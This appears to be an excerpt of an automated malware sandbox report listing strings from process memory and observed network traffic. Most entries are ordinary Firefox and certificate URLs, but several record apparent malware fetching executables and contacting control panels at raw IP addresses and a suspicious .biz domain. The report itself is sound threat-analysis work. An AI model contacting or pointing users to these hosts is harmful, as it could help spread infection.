Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2928082132.000001EB35803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2928082132.000001EB35803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2928082132.000001EB35803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: moz-extension://a581a2f1-688c-434b-8db8-16166b1993d9/lib/about_compat_broker.jshttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/[{incognito:null, tabId:null, types:["sub_frame"], urls:["*://trends.google.com/trends/embed*"], windowId:null}, ["blocking", "responseHeaders"]]The number of recent visits to sample when calculating the ranking of a page. Examining all the visits would be expensive, so we only sample recent visits.UpdateService:selectUpdate - skipping update because the update's application version is not greater than that of the currently downloaded updateAND (bookmarked OR frecency > 20) equals www.facebook.com (Facebook)
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: moz-extension://a581a2f1-688c-434b-8db8-16166b1993d9/lib/about_compat_broker.jshttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/[{incognito:null, tabId:null, types:["sub_frame"], urls:["*://trends.google.com/trends/embed*"], windowId:null}, ["blocking", "responseHeaders"]]The number of recent visits to sample when calculating the ranking of a page. Examining all the visits would be expensive, so we only sample recent visits.UpdateService:selectUpdate - skipping update because the update's application version is not greater than that of the currently downloaded updateAND (bookmarked OR frecency > 20) equals www.twitter.com (Twitter)
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: moz-extension://a581a2f1-688c-434b-8db8-16166b1993d9/lib/about_compat_broker.jshttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/[{incognito:null, tabId:null, types:["sub_frame"], urls:["*://trends.google.com/trends/embed*"], windowId:null}, ["blocking", "responseHeaders"]]The number of recent visits to sample when calculating the ranking of a page. Examining all the visits would be expensive, so we only sample recent visits.UpdateService:selectUpdate - skipping update because the update's application version is not greater than that of the currently downloaded updateAND (bookmarked OR frecency > 20) equals www.youtube.com (Youtube)
Source: firefox.exe, 00000034.00000003.2851918874.000001EB369E6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2942571768.000001EB378C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2957862215.000001EB39583000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 00000034.00000002.2933325693.000001EB365FE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 00000034.00000002.2909679467.000000D9FAE00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.comu equals www.youtube.com (Youtube)
Source: firefox.exe, 00000034.00000002.2942571768.000001EB3786C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2977449746.000001EB40E07000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2934876567.000001EB3699E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: x*://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: global traffic DNS traffic detected: DNS query: atten-supporse.biz
Source: global traffic DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic DNS traffic detected: DNS query: youtube.com
Source: global traffic DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: contile.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: spocs.getpocket.com
Source: global traffic DNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
Source: global traffic DNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: example.org
Source: global traffic DNS traffic detected: DNS query: ipv4only.arpa
Source: global traffic DNS traffic detected: DNS query: shavar.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: push.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: firefox.settings.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: telemetry-incoming.r53-2.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: prod.remote-settings.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: www.youtube.com
Source: global traffic DNS traffic detected: DNS query: www.facebook.com
Source: global traffic DNS traffic detected: DNS query: www.wikipedia.org
Source: global traffic DNS traffic detected: DNS query: dyna.wikimedia.org
Source: global traffic DNS traffic detected: DNS query: star-mini.c10r.facebook.com
Source: global traffic DNS traffic detected: DNS query: youtube-ui.l.google.com
Source: global traffic DNS traffic detected: DNS query: www.reddit.com
Source: global traffic DNS traffic detected: DNS query: twitter.com
Source: global traffic DNS traffic detected: DNS query: reddit.map.fastly.net
Source: global traffic DNS traffic detected: DNS query: support.mozilla.org
Source: global traffic DNS traffic detected: DNS query: us-west1.prod.sumo.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: services.addons.mozilla.org
Source: global traffic DNS traffic detected: DNS query: normandy.cdn.mozilla.net
Source: global traffic DNS traffic detected: DNS query: normandy-cdn.services.mozilla.com
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: atten-supporse.biz
Source: firefox.exe, 00000034.00000002.2928082132.000001EB35895000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:
Source: 847ee125a0.exe, 00000027.00000002.2995187227.000000000108B000.00000004.00000020.00020000.00000000.sdmp, 847ee125a0.exe, 00000027.00000002.2995187227.0000000000FF5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/
Source: 847ee125a0.exe, 00000027.00000002.2995187227.000000000108B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/1
Source: 847ee125a0.exe, 00000027.00000002.2995187227.000000000108B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/R
Source: skotes.exe, 00000006.00000002.2997566749.0000000000C1B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/luma/random.exe
Source: skotes.exe, 00000006.00000002.2997566749.0000000000C1B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/luma/random.exeU
Source: 847ee125a0.exe, 00000027.00000002.2994272482.0000000000BDB000.00000004.00000010.00020000.00000000.sdmp, 847ee125a0.exe, 00000027.00000002.2995187227.000000000108B000.00000004.00000020.00020000.00000000.sdmp, 847ee125a0.exe, 00000027.00000002.2995187227.0000000001014000.00000004.00000020.00020000.00000000.sdmp, 847ee125a0.exe, 00000027.00000002.2995187227.0000000001097000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exe
Source: 847ee125a0.exe, 00000027.00000002.2995187227.0000000001097000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exe/
Source: 847ee125a0.exe, 00000027.00000002.2995187227.0000000001097000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exez
Source: skotes.exe, 00000006.00000002.2997566749.0000000000C1B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/random.exe
Source: skotes.exe, 00000006.00000002.2997566749.0000000000C1B000.00000004.00000020.00020000.00000000.sdmp, 847ee125a0.exe, 00000027.00000002.2995187227.0000000001097000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: skotes.exe, 00000006.00000002.2997566749.0000000000C1B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/well/random.exe
Source: 847ee125a0.exe, 00000027.00000002.2995187227.0000000000FF5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16:80/off/def.exe
Source: 6bf436adc7.exe, 00000025.00000002.2719200023.00000000011DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206
Source: 6bf436adc7.exe, 00000025.00000002.2719200023.00000000011DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206.
Source: 6bf436adc7.exe, 00000025.00000002.2719200023.00000000011DE000.00000004.00000020.00020000.00000000.sdmp, 6bf436adc7.exe, 00000025.00000002.2719200023.0000000001237000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/
Source: 6bf436adc7.exe, 00000025.00000002.2719200023.0000000001237000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: 6bf436adc7.exe, 00000025.00000002.2719200023.0000000001237000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php(
Source: 6bf436adc7.exe, 00000025.00000002.2719200023.0000000001237000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php3
Source: 6bf436adc7.exe, 00000025.00000002.2719200023.0000000001237000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php?
Source: 6bf436adc7.exe, 00000025.00000002.2719200023.0000000001237000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/u
Source: 6bf436adc7.exe, 00000025.00000002.2719200023.0000000001237000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/ws
Source: skotes.exe, 00000006.00000002.2997566749.0000000000C1B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/
Source: skotes.exe, 00000006.00000002.2997566749.0000000000C1B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Local
Source: skotes.exe, 00000006.00000002.2997566749.0000000000BED000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2997566749.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2997566749.0000000000C1B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: skotes.exe, 00000006.00000002.2997566749.0000000000C1B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php.
Source: skotes.exe, 00000006.00000002.2997566749.0000000000C1B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php/
Source: skotes.exe, 00000006.00000002.2997566749.0000000000C1B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php/~
Source: skotes.exe, 00000006.00000002.2997566749.0000000000C1B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php1
Source: skotes.exe, 00000006.00000002.2997566749.0000000000C08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php3565001
Source: skotes.exe, 00000006.00000002.2997566749.0000000000C1B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpM
Source: skotes.exe, 00000006.00000002.2997566749.0000000000C1B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncoded
Source: skotes.exe, 00000006.00000002.2997566749.0000000000C08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpnu
Source: skotes.exe, 00000006.00000002.2997566749.0000000000C1B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpqYo30zpOYVp
Source: skotes.exe, 00000006.00000002.2997566749.0000000000C1B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/es
Source: skotes.exe, 00000006.00000002.2997566749.0000000000C08000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2997566749.0000000000BC9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/7403972632/C1J7SVw.exe
Source: skotes.exe, 00000006.00000002.2997566749.0000000000C08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/7403972632/C1J7SVw.exeED
Source: skotes.exe, 00000006.00000002.2997566749.0000000000BC9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/7403972632/C1J7SVw.exeshqos.dll
Source: firefox.exe, 00000034.00000002.2969544005.000001EB3E04D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearch/1.0/
Source: firefox.exe, 00000034.00000002.2969544005.000001EB3E04D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearch/1.1/
Source: firefox.exe, 00000034.00000002.2969544005.000001EB3E04D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.0/
Source: firefox.exe, 00000034.00000002.2969544005.000001EB3E04D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.1/
Source: 847ee125a0.exe, 00000024.00000003.2676443600.0000000005521000.00000004.00000800.00020000.00000000.sdmp, 847ee125a0.exe, 00000027.00000003.2845668781.00000000056F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: 847ee125a0.exe, 00000024.00000003.2676443600.0000000005521000.00000004.00000800.00020000.00000000.sdmp, 847ee125a0.exe, 00000027.00000003.2845668781.00000000056F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%shttps://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%shttps://poczta.interia.pl/mh/?mailto=%sScheme
Source: firefox.exe, 00000034.00000002.2925034988.000001EB33DD5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%ss
Source: 847ee125a0.exe, 00000024.00000003.2676443600.0000000005521000.00000004.00000800.00020000.00000000.sdmp, 847ee125a0.exe, 00000027.00000003.2845668781.00000000056F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: skotes.exe, 00000006.00000002.2997566749.0000000000C08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
Source: skotes.exe, 00000006.00000002.2997566749.0000000000C08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
Source: 847ee125a0.exe, 00000024.00000003.2676443600.0000000005521000.00000004.00000800.00020000.00000000.sdmp, 847ee125a0.exe, 00000027.00000003.2845668781.00000000056F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: 847ee125a0.exe, 00000024.00000003.2676443600.0000000005521000.00000004.00000800.00020000.00000000.sdmp, 847ee125a0.exe, 00000027.00000003.2845668781.00000000056F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: 847ee125a0.exe, 00000024.00000003.2676443600.0000000005521000.00000004.00000800.00020000.00000000.sdmp, 847ee125a0.exe, 00000027.00000003.2845668781.00000000056F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: 847ee125a0.exe, 00000024.00000003.2676443600.0000000005521000.00000004.00000800.00020000.00000000.sdmp, 847ee125a0.exe, 00000027.00000003.2845668781.00000000056F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: skotes.exe, 00000006.00000002.2997566749.0000000000C08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
Source: skotes.exe, 00000006.00000002.2997566749.0000000000C08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
Source: firefox.exe, 00000034.00000002.2916919570.000001EB31EE8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2972531378.000001EB4011F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com
Source: firefox.exe, 00000034.00000002.2927413392.000001EB35750000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2940906463.000001EB37016000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2948502881.000001EB381EC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000003.2851482973.000001EB381EC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/canonical.htmlURLFetcher/xhr.onreadystatechangeACTIVITY_SUBTYPE_PROX
Source: firefox.exe, 00000034.00000002.2927413392.000001EB35750000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000034.00000002.2932523071.000001EB36419000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
Source: firefox.exe, 00000034.00000002.2927413392.000001EB35750000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000034.00000002.2932523071.000001EB36419000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
Source: firefox.exe, 00000034.00000002.2916919570.000001EB31E2C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2916919570.000001EB31E11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListener
Source: firefox.exe, 00000034.00000002.2916919570.000001EB31E2C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2916919570.000001EB31E11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.removeEventListener
Source: firefox.exe, 00000034.00000002.2913294398.000001EB31526000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/common
Source: firefox.exe, 00000034.00000002.2913294398.000001EB31526000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/math
Source: firefox.exe, 00000034.00000002.2913294398.000001EB31526000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/sets
Source: firefox.exe, 00000034.00000002.2980664077.000008B206F00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.o
Source: firefox.exe, 00000034.00000002.2909679467.000000D9FAE00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.o08
Source: firefox.exe, 00000034.00000003.2899297807.000001EB402A6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2937567313.000001EB36C03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org
Source: firefox.exe, 00000034.00000002.2980664077.000008B206F00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/
Source: firefox.exe, 00000034.00000002.2987237966.00002EB89CB00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/0C
Source: firefox.exe, 00000034.00000002.2909679467.000000D9FAE00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/1
Source: firefox.exe, 00000034.00000002.2987237966.00002EB89CB00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/3-05-ZyC1
Source: firefox.exe, 00000034.00000002.2987237966.00002EB89CB00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/7
Source: firefox.exe, 00000034.00000002.2947037624.000001EB37FC2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2953557870.000001EB3915F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2945216472.000001EB37C82000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2939645568.000001EB36EF7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2958491496.000001EB396E3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2972531378.000001EB40157000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000003.2801689484.000001EB362F3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2940056297.000001EB36FD5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2947037624.000001EB37F8F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2940056297.000001EB36FF7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2929091475.000001EB35A05000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2947037624.000001EB37F24000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2957862215.000001EB39503000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2927413392.000001EB35750000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000003.2801689484.000001EB362ED000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2929091475.000001EB35A08000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2956825089.000001EB39383000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2940056297.000001EB36FCF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000003.2804071643.000001EB35EDB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2940056297.000001EB36FDA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2948502881.000001EB3810A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: firefox.exe, 00000034.00000002.2909679467.000000D9FAE00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/ZyC1
Source: firefox.exe, 00000034.00000002.2987237966.00002EB89CB00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/fig
Source: 847ee125a0.exe, 00000024.00000003.2676443600.0000000005521000.00000004.00000800.00020000.00000000.sdmp, 847ee125a0.exe, 00000027.00000003.2845668781.00000000056F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: 847ee125a0.exe, 00000024.00000003.2676443600.0000000005521000.00000004.00000800.00020000.00000000.sdmp, 847ee125a0.exe, 00000027.00000003.2845668781.00000000056F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: skotes.exe, 00000006.00000002.2997566749.0000000000C08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.sectigo.com0
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2916350174.000001EB31B7D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%shandlerSvc
Source: firefox.exe, 00000034.00000002.2925034988.000001EB33DD5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%sw
Source: firefox.exe, 00000034.00000002.2947037624.000001EB37FC2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2930502255.000001EB35D1E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.i.lencr.org/0.
Source: firefox.exe, 00000034.00000002.2945708134.000001EB37DAF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000003.2851696192.000001EB37DB5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2958491496.000001EB396B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.i.lencr.org/0W
Source: firefox.exe, 00000034.00000002.2947037624.000001EB37FC2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2945708134.000001EB37DAF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000003.2851696192.000001EB37DB5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2930502255.000001EB35D1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2958491496.000001EB396B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.o.lencr.org0
Source: C1J7SVw.exe, 00000007.00000002.2989356247.0000000000423000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://usbtor.ru/viewtopic.php?t=798)Z
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2916350174.000001EB31B7D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%sextractScheme/fixupChangedProtocol
Source: firefox.exe, 00000034.00000002.2925034988.000001EB33DD5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%sy
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2916350174.000001EB31B7D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%s
Source: firefox.exe, 00000034.00000002.2925034988.000001EB33DD5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%su
Source: firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2005/app-update
